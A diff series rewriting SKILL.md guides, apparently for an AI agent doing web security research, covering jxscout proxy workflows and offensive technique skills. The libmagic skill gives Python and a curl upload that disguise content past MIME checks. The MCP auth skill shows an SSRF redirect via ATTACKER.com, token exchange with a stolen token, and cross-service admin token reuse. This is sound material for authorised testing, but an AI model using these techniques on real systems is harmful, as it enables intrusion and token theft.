-- **Multi-step flows**: authentication sequences, payment flows, cross-origin communication chains, OAuth handshakes. Bookmark each step in the same group with notes describing the progression (e.g. "Step 1: redirect_uri parsed from query", "Step 2: passed to OAuth authorize endpoint without validation"). This makes complex flows reviewable as a sequence rather than scattered across files.
-- **Interesting functionality**: admin panels, feature flags, internal tools, debug endpoints -- anything that reveals capabilities or attack surface worth revisiting
+Sinks, message handlers without origin checks, auth logic, request construction with user-controlled params, JSONP callbacks, DOM clobbering targets, multi-step flows (bookmark each step in same group with progression notes).
 
-## Note quality
+Bookmarks can also point to raw `.req`/`.res` files in `http_requests/` for marking interesting API calls or auth flows.
 
-Notes should explain **why** the code is interesting, not just describe what it does.
+## Note guidelines
 
-Good notes:
-- "postMessage handler -- no origin check, passes `event.data.redirect` to `window.location`"
-- "Constructs API URL with user-controlled `req.query.callback` -- potential JSONP abuse"
-- "JWT decoded client-side without signature verification, role extracted from payload"
+Notes should explain **why** the code is interesting. Notes support markdown.
 
-Bad notes:
-- "This is a function"
-- "Event listener"
-- "API call"
-
-## Bookmarking HTTP request/response files
-
-If `http_requests/` exists in the project working directory, bookmarks can also point to raw `.req`/`.res` files captured by jxscout -- not just JS/HTML code. This is useful for marking interesting API calls, auth flows, or responses that contain relevant security data (tokens, error messages, internal paths).
-
-## Tips
-
-- Notes support markdown -- use code blocks, links, and formatting freely.
-- Reuse existing groups when the category fits; create new ones for distinct themes.
-- When bookmarking a function or block, include the full range (first to last line).
-- Use highlight colors to visually distinguish different risk levels or categories in VS Code.
+- Good: "postMessage handler -- no origin check, passes `event.data.redirect` to `window.location`"
+- Bad: "Event listener"

--- a/capabilities/web-security/skills/jxscout-relationships/SKILL.md
+++ b/capabilities/web-security/skills/jxscout-relationships/SKILL.md
@@ -58,15 +58,16 @@ Lists all iframes embedded by an HTML page. Relevant for:
 
 ## Workflow
 
-1. **Start with a page**: use `get-loaded-js-files` to see what JS runs on a specific page
-2. **Check iframes**: use `get-loaded-iframes` to understand cross-origin framing
-3. **Follow the chain**: reversed sources often have more readable code -- check those for sensitive logic
-4. **Trace back to pages**: use `get-js-file-loader-page` to find which pages load a specific JS file or reversed source -- useful when you find something interesting and need to know the affected pages
+1. **Start with a page**: `get-loaded-js-files` to see what JS runs on it
+2. **Check iframes**: `get-loaded-iframes` to understand cross-origin framing
+3. **Follow the chain**: reversed sources often have more readable code -- check for sensitive logic
+4. **Trace back to pages**: `get-js-file-loader-page` to find which pages load a specific JS file
+
+**Checkpoint:** After mapping a page's assets, verify the relationships match what you see in the browser's Network tab. Missing scripts may indicate lazy-loaded chunks.
 
 ## Use cases
 
-- **Scoping analysis to a page**: instead of searching the entire project, find exactly which JS files power a specific page and focus your review there
-- **Finding hidden code**: lazy-loaded chunks often contain admin panels, internal tools, or feature-flagged code that isn't loaded by default
-- **postMessage research**: mapping which iframes a page loads helps identify cross-origin messaging patterns
-- **Understanding dependencies**: tracing which pages load a vulnerable script helps assess impact
-- **Impact assessment**: given a JS file or reversed source with a finding, use `get-js-file-loader-page` to determine which pages are affected and prioritize accordingly
+- **Scoping**: find exactly which JS files power a page, focus review there
+- **Hidden code**: lazy-loaded chunks often contain admin panels, feature flags, debug endpoints
+- **postMessage**: mapping iframes identifies cross-origin messaging patterns
+- **Impact**: given a vulnerable JS file, `get-js-file-loader-page` reveals which pages are affected

--- a/capabilities/web-security/skills/jxscout-relationships/SKILL.md
+++ b/capabilities/web-security/skills/jxscout-relationships/SKILL.md
@@ -58,16 +58,9 @@ Lists all iframes embedded by an HTML page. Relevant for:
 
 ## Workflow
 
-1. **Start with a page**: `get-loaded-js-files` to see what JS runs on it
-2. **Check iframes**: `get-loaded-iframes` to understand cross-origin framing
-3. **Follow the chain**: reversed sources often have more readable code -- check for sensitive logic
-4. **Trace back to pages**: `get-js-file-loader-page` to find which pages load a specific JS file
+1. **Scope to a page**: `get-loaded-js-files` to see what JS runs on it — focus review on these files rather than the entire project
+2. **Check iframes**: `get-loaded-iframes` to identify cross-origin messaging patterns (postMessage targets, clickjacking candidates)
+3. **Follow the chain**: reversed sources often have more readable code — check for admin panels, feature flags, debug endpoints in lazy-loaded chunks
+4. **Assess impact**: given a vulnerable JS file, `get-js-file-loader-page` reveals which pages are affected
 
-**Checkpoint:** After mapping a page's assets, verify the relationships match what you see in the browser's Network tab. Missing scripts may indicate lazy-loaded chunks.
-
-## Use cases
-
-- **Scoping**: find exactly which JS files power a page, focus review there
-- **Hidden code**: lazy-loaded chunks often contain admin panels, feature flags, debug endpoints
-- **postMessage**: mapping iframes identifies cross-origin messaging patterns
-- **Impact**: given a vulnerable JS file, `get-js-file-loader-page` reveals which pages are affected
+**Checkpoint:** After mapping a page's assets, verify the relationships match what you see in the browser's Network tab. If scripts are missing, check for lazy-loaded chunks by searching for dynamic `import()` calls in the loaded JS: `rg "import\(" <js_file_path>`. If chunks are found, trace their loader page to complete the map.

--- a/capabilities/web-security/skills/jxscout-security-research/SKILL.md
+++ b/capabilities/web-security/skills/jxscout-security-research/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: jxscout-security-research
-description: Holistic guide for using jxscout capabilities together for vulnerability assessment -- routes to specific jxscout-* skills for static analysis, findings, bookmarks, repeater, custom analyzers, relationships, and setup. Use when starting a new target assessment, planning attack surface mapping, or understanding how jxscout tools fit together.
+description: Coordinates end-to-end jxscout vulnerability assessment workflows including target enumeration, static analysis triage, and finding documentation -- routes to specific jxscout-* skills for each phase. Use when starting a new target assessment, planning attack surface mapping, performing security testing, finding vulnerabilities, or understanding how jxscout tools fit together.
 license: proprietary
 metadata:
   source: jxscout-pro-v2

--- a/capabilities/web-security/skills/jxscout-security-research/SKILL.md
+++ b/capabilities/web-security/skills/jxscout-security-research/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: jxscout-security-research
-description: Holistic guide for using jxscout to perform real vulnerability assessment on web applications. Use when doing security research, vulnerability hunting, attack surface mapping, or when you need to understand how jxscout's capabilities fit together for effective security analysis.
+description: Holistic guide for using jxscout capabilities together for vulnerability assessment -- routes to specific jxscout-* skills for static analysis, findings, bookmarks, repeater, custom analyzers, relationships, and setup. Use when starting a new target assessment, planning attack surface mapping, or understanding how jxscout tools fit together.
 license: proprietary
 metadata:
   source: jxscout-pro-v2
@@ -8,191 +8,67 @@ metadata:
   origin: ported from jxscout-pro-v2 agent skills
 ---
 
-# Security Research with jxscout
+jxscout is a JS security analysis proxy -- intercepts traffic, ingests JS/HTML, runs static analyzers, reverses source maps, and maps client-side attack surface.
 
-jxscout is a JavaScript security analysis and recon tool that acts as an MITM HTTP/S proxy. It intercepts web traffic, ingests JS/HTML files, runs static analyzers, reverses source maps, and gives you a full picture of the client-side attack surface. This guide explains how to use its capabilities together for real vulnerability assessment -- not just pattern matching.
+Prerequisites: `JXSCOUT_PROJECT_NAME` env var must be set (from project `.env`). All CLI commands use `jxscout-pro-v2 -c` (client mode).
 
-## Mindset
+## Routing Table
 
-You are doing security research, not running a scanner. jxscout gives you tools to explore, analyze, and test. The goal is to find real vulnerabilities -- exploitable bugs that have actual security impact. That means:
+| Need | Skill | Key command |
+|---|---|---|
+| Query static analysis matches | `jxscout-static-analysis` | `jxscout-pro-v2 -c get-matches --match-kind <type>` |
+| Document a finding | `jxscout-findings` | `jxscout-pro-v2 -c create-finding` |
+| Bookmark interesting code | `jxscout-bookmarks` | `jxscout-pro-v2 -c bookmark create` |
+| Send/replay HTTP requests | `jxscout-repeater` | `jxscout-pro-v2 -c repeater <path>` |
+| Create custom analyzers | `jxscout-custom-analyzers` | edit `settings.jsonc` analyzer section |
+| Map asset relationships | `jxscout-relationships` | `jxscout-pro-v2 -c get-loaded-js-files <url>` |
+| Setup, settings, hooks | `jxscout-setup` | `jxscout-pro-v2 -c print-full-project-settings` |
 
-- **Follow the data**: trace how user input flows through the application, from URL parameters and postMessage events to DOM sinks and API calls.
-- **Think like an attacker**: what can be controlled, what can be reached, what can be chained?
-- **Go beyond matches**: static analysis results are a starting point, not the end. Read the surrounding code, understand the context, check for sanitization, find alternative paths.
-- **Verify with real requests**: use captured HTTP traffic and the repeater to confirm that what you see in code actually works in practice.
-- **Document as you go**: bookmark interesting code, create findings for confirmed issues, mark reviewed matches as seen so you don't revisit them.
+## Research Workflow
 
-## Prerequisites
-
-The `JXSCOUT_PROJECT_NAME` environment variable must be set. It is available in the project's `.env` file at the root of the working directory. All CLI commands use `jxscout-pro-v2 -c` (client mode).
-
-## Capabilities overview
-
-### HTTP request/response context
-
-If `http_requests/` exists in the project working directory, jxscout has captured raw HTTP traffic from the target. The files are organized as `http_requests/{host}/{path}/{METHOD}/{timestamp}_{status}.req|.res`.
-
-Use captured traffic to:
-
-- **Understand real API patterns**: see actual request bodies, auth headers, cookies, and content types the application sends
-- **Discover endpoints not visible in JS**: some endpoints only appear in server responses, redirects, or error messages
-- **Cross-reference with static analysis**: match `path` or `api_path` results against real requests to see how endpoints are actually called
-- **Find auth tokens and session handling**: look at `Authorization`, `Cookie`, and `Set-Cookie` headers across requests
-- **Identify interesting responses**: error messages, stack traces, internal paths, version numbers, debug output
-
-### Static analysis (matches)
-
-jxscout runs static analyzers on every JS and HTML file it ingests. Results are called **matches** -- structured data pointing to specific patterns (paths, URLs, secrets, sinks, etc.).
-
-Use matches when they're useful for your investigation -- don't wait to be asked. They're a tool for pinpointing specific things efficiently:
-
+### 1. Orient
 ```bash
+# Understand what traffic was captured
+ls http_requests/
+# Check project settings
+jxscout-pro-v2 -c print-full-project-settings
+```
+
+### 2. Enumerate attack surface
+```bash
+# List all match kinds available
 jxscout-pro-v2 -c list-match-kinds --json
+
+# Get high-value matches
+jxscout-pro-v2 -c get-matches --match-kind secret --json --show-only-unseen
+jxscout-pro-v2 -c get-matches --match-kind onmessage --json --show-only-unseen
 jxscout-pro-v2 -c get-matches --match-kind path --json --show-only-unseen
-jxscout-pro-v2 -c get-matches --match-kind secret --json
-jxscout-pro-v2 -c get-matches --match-kind onmessage --json --value-include "origin"
 ```
 
-But also grep the codebase directly, read code manually, and explore beyond what analyzers find. Matches only cover what analyzers are configured to detect.
+**Checkpoint:** Record total unseen match counts per kind. Prioritize: secrets > sinks > onmessage > paths.
 
-### Tracking progress with seen/unseen
+### 3. Triage matches
+For each match: read surrounding code, trace data flow, assess exploitability.
+- Sink with attacker-controlled input -> potential vulnerability, bookmark and investigate
+- Interesting pattern but no clear exploit -> bookmark as gadget for later chaining
+- False positive -> mark as seen: `jxscout-pro-v2 -c mark-matches-seen --match-ids 1,2,3`
 
-Matches have a seen/unseen status. Use this to track what you've reviewed:
-
-```bash
-# Mark specific matches as seen after reviewing them
-jxscout-pro-v2 -c mark-matches-seen --match-ids 1,2,3
-
-# Mark all matches of a kind as seen (bulk)
-jxscout-pro-v2 -c mark-matches-seen --match-kind path
-
-# Focus on unreviewed matches
-jxscout-pro-v2 -c get-matches --match-kind path --json --show-only-unseen
-
-# Re-mark as unseen if you want to revisit
-jxscout-pro-v2 -c mark-matches-unseen --match-ids 4,5,6
-```
-
-This is especially valuable for large projects where there are thousands of matches. Review systematically, mark as seen, and use `--show-only-unseen` to always see what's new or unreviewed.
-
-### Custom analyzers
-
-When you find a pattern worth tracking across the entire project, create a custom analyzer rather than manually grepping for it repeatedly. There are three types:
-
-- **Regex**: simple literal patterns (hardcoded URLs, API keys, specific strings)
-- **Derived**: narrow down an existing match kind by value
-- **Script (semgrep)**: code-semantic analysis (function calls, assignments, data flow, missing checks)
-
-Add them to `settings.jsonc` under `analyzer > custom_analyzers`, test with `analyze`, then `retrigger-events --subscriber analyzer` to generate matches project-wide. See the custom-analyzers skill for full details.
-
-### Bookmarks
-
-Bookmark code you want to come back to -- sinks, gadgets, interesting flows, authentication logic, request construction patterns. Group related bookmarks together and write notes explaining **why** the code is interesting, not just what it does.
-
-Bookmarks are especially useful for documenting multi-step flows: bookmark each step in the same group with notes that describe the progression (e.g., "Step 1: user input received here", "Step 2: passed to API construction without validation", "Step 3: sent in fetch request").
-
-```bash
-jxscout-pro-v2 -c bookmark create-group --name "OAuth flow"
-jxscout-pro-v2 -c bookmark create \
-  --group "OAuth flow" \
-  --file-path /path/to/auth.js \
-  --start-line 45 --start-column 0 \
-  --end-line 52 --end-column 1 \
-  --note "Step 1: OAuth redirect constructed with user-controlled redirect_uri parameter"
-```
-
-### Repeater
-
-Use the repeater to test endpoints hands-on. Start from captured requests in `http_requests/`, copy to `repeater/<endpoint>/<test>/original.req`, then iterate:
-
-```bash
-jxscout-pro-v2 -c repeater repeater/api_v2_users/idor_test/original.req
-```
-
-Edit `original.req` between runs -- each send creates timestamped copies so your full history is preserved. See the repeater skill for full details.
-
-### Findings
-
-Document confirmed vulnerabilities and useful primitives as findings:
-
-```bash
-jxscout-pro-v2 -c create-finding \
-  --kind xss \
-  --severity high \
-  --description "Reflected XSS in /search endpoint via q parameter -- innerHTML assignment without sanitization" \
-  --dedup-key "/search:q:xss"
-```
-
-Create findings for things with real security value: confirmed vulns, interesting gadgets, exploitable primitives. Not for theoretical risks without evidence. See the findings skill for full details.
-
-### Asset relationships
-
-Map the attack surface by understanding how assets relate:
-
+### 4. Deep-dive interesting files
 ```bash
 # What JS runs on a specific page?
 jxscout-pro-v2 -c get-loaded-js-files https://target.com/app --json
 
 # Which pages load a vulnerable script?
 jxscout-pro-v2 -c get-js-file-loader-page /path/to/vulnerable.js --json
-
-# What iframes does a page embed?
-jxscout-pro-v2 -c get-loaded-iframes https://target.com/app --json
-
-# Full relationship graph
-jxscout-pro-v2 -c get-related-assets /path/to/file --json
 ```
 
-This is critical for impact assessment: finding a sink in a JS file is more valuable when you know which pages load it.
+### 5. Test and validate
+Use `jxscout-repeater` to replay/modify requests. Confirm findings with working PoCs.
 
-### Project settings
+### 6. Document
+Log confirmed findings via `jxscout-findings`. Bookmark key code patterns via `jxscout-bookmarks`.
 
-The project's behavior is controlled by `settings.jsonc` in the working directory. You can view the full resolved settings (defaults merged with overrides) with:
+### 7. Automate patterns
+If you spot a recurring pattern, create a custom analyzer via `jxscout-custom-analyzers`. Then retrigger: `jxscout-pro-v2 -c retrigger-events --subscriber analyzer`
 
-```bash
-jxscout-pro-v2 -c print-full-project-settings
-```
-
-Update `settings.jsonc` when it helps your assessment:
-
-- **Scope**: adjust `ingestion > scope` to include or exclude specific hostnames/patterns
-- **HTTP ingestion**: configure `http_request_ingestion` rules to capture or skip specific request patterns
-- **Analyzer config**: add custom analyzers, adjust file type targets, enable/disable specific analysis
-- **VS Code extension view**: add new match kinds to `vscode_extension > matches_view > structure` so they appear in the sidebar
-
-jxscout auto-reloads when `settings.jsonc` changes.
-
-### Path discovery and bruteforcing
-
-Use discovered paths from static analysis as input for endpoint discovery:
-
-```bash
-# Get all discovered paths
-jxscout-pro-v2 -c get-matches --match-kind path
-
-# Get API-specific paths
-jxscout-pro-v2 -c get-matches --match-kind api_path
-
-# Generate wordlists from extracted words
-jxscout-pro-v2 -c wordlist --json
-```
-
-Combine these with scripting to probe for hidden endpoints, test path variations, or bruteforce parameter values. Create scripts in the project directory as needed.
-
-## Research workflow
-
-There's no single correct order. Adapt based on what you're investigating and what you find. Here's a typical flow:
-
-1. **Orient**: browse `http_requests/` to understand what the application does, what APIs it calls, how authentication works. Check asset relationships to understand the page/script structure.
-
-2. **Map the surface**: query matches for paths, URLs, hostnames to get an overview of the exposed attack surface. Use relationships to scope your analysis to specific pages.
-
-3. **Hunt for vulnerabilities**: focus on high-value match kinds (secrets, sinks, onmessage, html_manipulation). Read the surrounding code. Trace data flows. Check for sanitization and validation.
-
-4. **Test**: use the repeater to send real requests. Modify parameters, headers, auth tokens. Verify that what you found in code is actually exploitable.
-
-5. **Document**: create findings for confirmed issues. Bookmark interesting code for future reference. Mark reviewed matches as seen.
-
-6. **Automate**: if you spot a pattern worth tracking, create a custom analyzer. If you need to test many endpoints, write a script.
-
-7. **Iterate**: new files get ingested as jxscout captures more traffic. Check `--show-only-unseen` to see new matches. Re-examine areas as your understanding deepens.
+**Checkpoint:** After each investigation round, verify all reviewed matches are marked seen (`--show-only-unseen` should return only new/unreviewed items).

--- a/capabilities/web-security/skills/jxscout-static-analysis/SKILL.md
+++ b/capabilities/web-security/skills/jxscout-static-analysis/SKILL.md
@@ -10,9 +10,7 @@ metadata:
 
 # jxscout Static Analysis (Matches)
 
-jxscout runs static analyzers on every JS and HTML file it ingests. The results are called **matches** -- structured data pointing to specific patterns in the code (paths, URLs, secrets, sinks, etc.).
-
-Use matches as a tool during your investigation -- query them when they're relevant, not only when explicitly asked. They're efficient for pinpointing specific patterns across a large codebase. But always supplement with grepping and manual code review for patterns the analyzers don't cover.
+jxscout runs static analyzers on every ingested JS and HTML file. Results are **matches** -- structured data pointing to patterns (paths, URLs, secrets, sinks). Query them during investigation alongside direct code search for patterns analyzers don't cover.
 
 ## Prerequisites
 
@@ -102,15 +100,17 @@ Returns JSON: `{"updated_count": N}`
 ## Workflow
 
 1. **Discover match kinds**: `jxscout-pro-v2 -c list-match-kinds --json`
-2. **Query relevant kinds**: start with high-value kinds like `path`, `api_path`, `secret`, `onmessage`, `html_manipulation`
-3. **Use filters** to focus on what matters:
-   - `--value-include "admin"` to find admin-related paths
-   - `--value-include "internal"` to find internal endpoints
-   - `--file-path-include "auth"` to scope to auth-related files
-   - `--show-only-unseen` to focus on unreviewed matches
-4. **Read the code** at the match positions to understand context
+2. **Query high-value kinds first**: `secret`, `onmessage`, `html_manipulation`, then `path`, `api_path`
+3. **Use filters** to focus:
+   - `--value-include "admin"` for admin-related paths
+   - `--value-include "internal"` for internal endpoints
+   - `--file-path-include "auth"` to scope to auth files
+   - `--show-only-unseen` for unreviewed matches only
+4. **Read the code** at match positions to understand context
 5. **Mark as seen** after reviewing: `mark-matches-seen --match-ids <ids>`
-6. **Grep for more**: matches only cover what analyzers are configured to find -- search the codebase directly for patterns you care about that aren't covered
+6. **Grep for more**: matches only cover configured analyzers -- search directly for uncovered patterns
+
+**Checkpoint:** After each triage session, verify all reviewed matches are marked seen. Use `get-matches --match-kind <kind> --show-only-unseen` to confirm only new/unreviewed items remain.
 
 ## HTTP request context
 

--- a/capabilities/web-security/skills/jxscout-static-analysis/SKILL.md
+++ b/capabilities/web-security/skills/jxscout-static-analysis/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: jxscout-static-analysis
-description: Query and manage jxscout static analysis matches -- list match kinds, get matches with filters, mark matches as seen/unseen. Use when investigating code patterns, exploring the attack surface, or tracking review progress across match results.
+description: Query and manage jxscout static analysis matches -- list match kinds, get matches with filters, mark matches as seen/unseen. Use when triaging security findings, investigating code patterns, exploring the attack surface, reviewing scan results, or tracking vulnerability triage progress across match results.
 license: proprietary
 metadata:
   source: jxscout-pro-v2
@@ -114,21 +114,8 @@ Returns JSON: `{"updated_count": N}`
 
 ## HTTP request context
 
-If `http_requests/` exists in the project working directory, jxscout has captured raw HTTP traffic from the target. The files are organized as `http_requests/{host}/{path}/{METHOD}/{timestamp}_{status}.req|.res` and contain raw HTTP request/response pairs.
-
-Use these alongside static analysis to:
-- **Cross-reference API calls**: match `path` or `api_path` results against actual captured requests to see real parameters, headers, and auth tokens in use
-- **Discover endpoints not in JS**: some endpoints are only visible in server responses or redirects, not in client-side code
-- **Understand real request patterns**: see actual `Content-Type`, auth headers, cookies, and request bodies that the application sends
-- **Validate findings**: check if a pattern found via static analysis is actually exercised in real traffic
-
-Browse `http_requests/` with `ls` / `find` and read individual `.req`/`.res` files to enrich your analysis.
+If `http_requests/` exists in the project directory, jxscout captured raw HTTP traffic organized as `http_requests/{host}/{path}/{METHOD}/{timestamp}_{status}.req|.res`. Cross-reference `path`/`api_path` matches against captured requests to see real parameters and auth tokens, and to validate that static patterns are exercised in real traffic.
 
 ## Limitations
 
-Matches are only as good as the configured analyzers. Things that matches will NOT catch include:
-- Dynamically constructed URLs or paths (e.g. `base + "/api/" + endpoint`)
-- Patterns not covered by any enabled analyzer
-- Logic bugs, race conditions, or business logic flaws
-
-When investigating a specific area, always combine match queries with direct code search (grep/ripgrep) to get the full picture. If you find a pattern worth tracking systematically, consider creating a custom analyzer for it.
+Matches only cover configured analyzers — dynamically constructed URLs, logic bugs, and uncovered patterns require direct code search. Always complement match queries with `rg` for the full picture.

--- a/capabilities/web-security/skills/libmagic-type-confusion/SKILL.md
+++ b/capabilities/web-security/skills/libmagic-type-confusion/SKILL.md
@@ -1,91 +1,88 @@
 ---
 name: libmagic-type-confusion
-description: Bypass file type detection using libmagic's JSON nesting depth limit to force type confusion. Upload files that evade MIME checks by exploiting recursion guards in file or libmagic. Use when file uploads validate type via libmagic or the file command and you need to smuggle executable content.
+description: Bypass file type detection using libmagic's JSON nesting depth limit to force type confusion. Use when file uploads validate type via libmagic or the file command and you need to smuggle executable content past MIME checks.
 ---
 
 # libmagic Type Confusion via Deep JSON Nesting
 
 ## Pattern
-- The application validates upload type using `file` or libmagic bindings
-- Dangerous formats such as HTML, SVG, or script-capable content are blocked
-- A later processing stage handles the uploaded file based on the detected type
+- Application validates upload type using `file` or libmagic bindings
+- Dangerous formats (HTML, SVG, script-capable) are blocked
+- A later processing stage handles the uploaded file based on detected type
 
-## Root Cause
-libmagic's JSON detector includes a recursion guard:
+## Workflow
 
-```c
-if (lvl > 500) {
-    return 0;
-}
+### 1. Detect libmagic usage
+```bash
+# Check if target uses libmagic/file command for validation
+rg -i "finfo|magic_open|python-magic|ruby-filemagic|file_get_contents.*mime" --type py --type rb --type php src/
+
+# Check file command version (depth limit varies)
+file --version 2>&1 | head -1
 ```
 
-Once nesting exceeds the guard, libmagic stops treating the file as JSON. If another recognizable signature is embedded, classification may fall through to that type instead.
+**Checkpoint:** If target uses Node.js-only MIME, Apache Tika, or .NET-native detection, this technique does not apply.
 
-## Version Differences
+### 2. Determine depth threshold
 
-| Version | JSON depth limit | Notes |
-|---------|------------------|-------|
-| libmagic 5.41 | about 10 levels | easier to exploit |
-| libmagic 5.46+ | about 500 levels | requires deeper nesting |
+| Version | JSON depth limit | Nesting needed |
+|---------|------------------|----------------|
+| libmagic 5.41 | ~10 levels | easy |
+| libmagic 5.46+ | ~500 levels | 510+ levels |
 
-## Exploitation
-
-### Step 1: Generate nested JSON with an embedded signature
+### 3. Generate confused payload
 ```python
 #!/usr/bin/env python3
-import json
+import json, sys
 
 def make_payload(depth=510, target_sig="%PDF-1.4"):
     obj = "terminal"
     for i in range(depth):
         obj = {f"l{i}": obj}
     obj["_sig"] = target_sig + "\n1 0 obj\n<<\n/Type /Catalog\n>>\nendobj\n%%EOF"
-    return json.dumps(obj)
+    with open("confused.json", "w") as f:
+        json.dump(obj, f)
+
+make_payload()
 ```
 
-### Step 2: Verify confusion locally
+### 4. Verify confusion locally
 ```bash
+python3 -c "
+import json
+obj = 'x'
+for i in range(510): obj = {f'l{i}': obj}
+obj['_sig'] = '%PDF-1.4\n1 0 obj\n<<\n/Type /Catalog\n>>\nendobj\n%%EOF'
+open('confused.json','w').write(json.dumps(obj))
+"
 file confused.json
+# Expected: "PDF document" instead of "JSON data"
 ```
 
-### Step 3: Upload and trigger the downstream handler
-The goal is not just misclassification. Confirm the file reaches a parser, renderer, or execution path that trusts the reported type.
+**Checkpoint:** If `file` still reports JSON, increase depth or check version. If it reports the target type, proceed.
+
+### 5. Upload and trigger downstream handler
+```bash
+curl -x localhost:8080 -k "https://target.com/upload" \
+  -F "file=@confused.json;type=application/json"
+```
+
+The goal is not just misclassification -- confirm the file reaches a parser, renderer, or execution path that trusts the reported type.
 
 ## Practical Payloads
 
-### PDF smuggling
-Embed a PDF header and minimal PDF structure so the target routes it into a PDF pipeline.
+- **PDF smuggling**: embed `%PDF-1.4` header + minimal structure -> routes to PDF pipeline
+- **HTML smuggling**: on older libmagic, shallow nesting hides HTML/SVG from JSON detection
+- **SVG smuggling**: embed SVG signature for XSS via image processing pipelines
 
-### HTML smuggling
-On older libmagic versions, shallow nesting may be enough to hide HTML or SVG content from JSON detection.
-
-## Language and Library Coverage
-
-Affected when they inherit libmagic behavior:
-- C and C++
-- Perl
-- Ruby
-- PHP `finfo`
-- Python `python-magic`
-- Go wrappers around libmagic
-
-Usually not affected by this exact bug class:
-- Node.js-only MIME implementations
-- Java systems using Apache Tika
-- .NET-native MIME detection
-- Rust-native detection libraries
-
-## Testing Steps
-1. Determine whether the target uses libmagic or `file`.
-2. Identify the version if possible.
-3. Generate a nested JSON payload matching the target depth threshold.
-4. Embed the target type signature.
-5. Confirm both type confusion and downstream processing.
+## Affected Libraries
+- C/C++, Perl, Ruby, PHP `finfo`, Python `python-magic`, Go libmagic wrappers
+- NOT affected: Node.js-only MIME, Apache Tika, .NET-native detection, Rust-native detection
 
 ## Chain With
-- `dom-vulnerability-detection`
-- `write-path-to-rce`
-- `parser-differential-bypass`
+- `dom-vulnerability-detection` (if HTML/SVG smuggled)
+- `write-path-to-rce` (if file write achieved)
+- `parser-differential-bypass` (complementary technique)
 
 ## References
 - https://lab.ctbb.show/research/libmagic-inconsistencies-that-lead-to-type-confusion

--- a/capabilities/web-security/skills/mcp-auth-exploitation/SKILL.md
+++ b/capabilities/web-security/skills/mcp-auth-exploitation/SKILL.md
@@ -40,7 +40,7 @@ curl -X POST https://TARGET/openid/connect/register \
   }'
 ```
 
-**Success indicators:** 201 with `client_id` + `client_secret` in response. Check `client_secret_expires_at` — value of `0` means non-expiring secret.
+**Checkpoint:** 201 with `client_id` + `client_secret` in response = open registration confirmed. Check `client_secret_expires_at` -- value of `0` means non-expiring secret. If 401/403, registration requires authentication.
 
 ### MCP CIMD Detection
 

--- a/capabilities/web-security/skills/mcp-auth-exploitation/SKILL.md
+++ b/capabilities/web-security/skills/mcp-auth-exploitation/SKILL.md
@@ -114,16 +114,7 @@ client_manifest_uri=https://ATTACKER.com/redir
 
 Servers that validate the initial URL scheme (https only) but follow redirects to http:// are vulnerable. Test with 301, 302, 307, and 308 — behavior differs per HTTP client library.
 
-### User-Agent Fingerprinting
-
-Log the User-Agent on your callback server. The fetching library reveals the server's tech stack:
-
-- `python-requests/2.x` → Python, likely aiohttp or requests
-- `Go-http-client/2.0` → Go, net/http
-- `axios/1.x` → Node.js
-- `Java/17.x` → Java HttpClient
-
-This informs which protocol smuggling and SSRF bypass techniques to prioritize.
+**Checkpoint:** After SSRF attempts, check whether responses are reflected in the registration response or error messages. If reflected, extract data directly. If blind (no content returned), chain with `ssrf-redirect-loop` for error differential exfiltration.
 
 ## 3. Domain Validation Bypass in redirect_uris
 
@@ -185,19 +176,11 @@ curl -X POST https://TARGET/oauth/token \
   -d "grant_type=urn:ietf:params:oauth:grant-type:token-exchange&subject_token=STOLEN_TOKEN&subject_token_type=urn:ietf:params:oauth:token-type:access_token&client_id=ATTACKER_CLIENT&client_secret=SECRET"
 ```
 
-Check token `scope` and `aud` claims — tokens scoped to internal resources (e.g., `https://internal-api.local/*`) indicate the authorization server trusts dynamically registered clients at the same level as pre-registered ones.
+**Checkpoint:** Decode issued tokens with `echo "TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | jq '.scope, .aud'`. If `scope` includes internal resources or `aud` is unrestricted, proceed to scope inflation testing. If `client_credentials` returns a token, test cross-service reuse: `curl -H "Authorization: Bearer TOKEN" https://target.com/api/admin/users`.
 
 ## 5. Token Scope Inflation in Multi-Agent Chains (Confused Deputy)
 
-MCP and multi-agent architectures often pass tokens downstream without scope reduction. The absence of RFC 8693 (Token Exchange) creates confused deputy vulnerabilities.
-
-### The Problem
-
-```
-User Token (scope: read write admin) → Agent A → Agent B → Tool C (Weather API)
-```
-
-Tool C receives a token with `admin` scope when it only needs `weather.read`. If Tool C is compromised or malicious, it can use the over-scoped token.
+MCP and multi-agent architectures often pass tokens downstream without scope reduction (RFC 8693 Token Exchange absent).
 
 ### Testing Methodology
 
@@ -207,20 +190,14 @@ Tool C receives a token with `admin` scope when it only needs `weather.read`. If
 4. **Check audience binding** — does the token's `aud` claim restrict which services can accept it?
 
 ```bash
-# Intercept and decode the token passed to a tool
-# If JWT, decode and check scope/aud
+# Decode token at each hop and compare scope/aud
 echo "TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | jq '.scope, .aud'
 
 # Test cross-service token reuse
 curl -H "Authorization: Bearer TOOL_C_TOKEN" https://target.com/api/admin/users
 ```
 
-### What to Report
-
-- Token passed to downstream tools with more scope than needed → scope inflation
-- No `aud` restriction → token accepted by any service in the ecosystem
-- No token exchange → original user token forwarded verbatim through chain
-- Tool receives refresh token → persistent access beyond intended session
+**Checkpoint:** If token scopes are not reduced at each hop, or if `aud` is missing/wildcard, report as confused deputy. If tool receives refresh token, report persistent access beyond intended session.
 
 ## 6. Detection Checklist
 

--- a/capabilities/web-security/skills/nextjs-cache-poisoning/SKILL.md
+++ b/capabilities/web-security/skills/nextjs-cache-poisoning/SKILL.md
@@ -1,32 +1,54 @@
 ---
 name: nextjs-cache-poisoning
-description: Internal cache poisoning in Next.js via stale cache entries and header manipulation. Use when target runs Next.js (/_next/ paths, x-nextjs-cache header, __nextjs_original-cache-control).
+description: Internal cache poisoning in Next.js via stale cache entries and header manipulation. Use when target runs Next.js (/_next/ paths, x-nextjs-cache header, __nextjs_original-cache-control) and you need to poison cached responses.
 ---
 
 # Next.js Cache Poisoning
 
-## Pattern
-- `/_next/` paths in responses or `x-nextjs-cache` header (HIT/STALE/MISS)
-- `x-nextjs-stale-time` or `__nextjs_original-cache-control` in responses
-- SSR routes returning `s-maxage=31536000, stale-while-revalidate`
-- `x-now-route-matches` header presence
+## Detection
+```bash
+# Check for Next.js cache indicators
+curl -sD- "https://target.com/" | rg -i "x-nextjs-cache|x-nextjs-stale|__nextjs_original|x-now-route"
 
-## Probe
-1. Identify SSR routes with aggressive cache headers (not `private, no-cache`)
